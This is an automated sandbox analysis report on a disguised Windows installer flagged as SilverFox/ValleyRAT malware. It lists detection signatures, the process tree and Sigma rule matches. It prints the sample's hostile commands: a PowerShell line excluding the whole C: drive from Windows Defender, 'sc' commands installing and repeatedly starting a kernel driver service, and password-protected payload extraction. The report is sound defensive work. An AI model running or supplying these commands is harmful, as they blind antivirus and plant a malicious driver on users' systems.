Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe

Overview

General Information

Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
renamed because original name is a hash value
Original sample name:_1.1.4.exe
Analysis ID:1580542
MD5:704d909b74fde4f05ceba394fc91416b
SHA1:e78859d87194b3968f1492e18f93424ccd946d63
SHA256:a7e3fad1d01f1888aa10d040699857288d4c6b4dc0e77eb5381e34c5c9e8e4e9
Tags:exeSilverFoxValleyRATwinosuser-Fadouse
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" MD5: 704D909B74FDE4F05CEBA394FC91416B)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" MD5: 833E148BCEB71E3D12C96B53539F24E1)
      • powershell.exe (PID: 7324 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7524 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT MD5: 704D909B74FDE4F05CEBA394FC91416B)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp (PID: 7636 cmdline: "C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT MD5: 833E148BCEB71E3D12C96B53539F24E1)
          • 7zr.exe (PID: 7724 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7812 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7692 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7708 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7892 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7944 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3608 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3752 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7608 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7316 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7732 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7768 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8008 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7348 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3220 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1596 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6600 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5264 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7316 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7296 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7708, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7708, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ParentProcessId: 7304, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7324, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 37%Perma Link
Source: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbcReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbcReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeVirustotal: Detection: 8%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.2% probability
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1798230293.0000000003090000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1798079649.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmpCode function: 6_2_6C0EE090 FindFirstFileA,FindClose,FindClose,6_2_6C0EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00CA6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00CA7496
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000003.1764353867.0000000004230000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
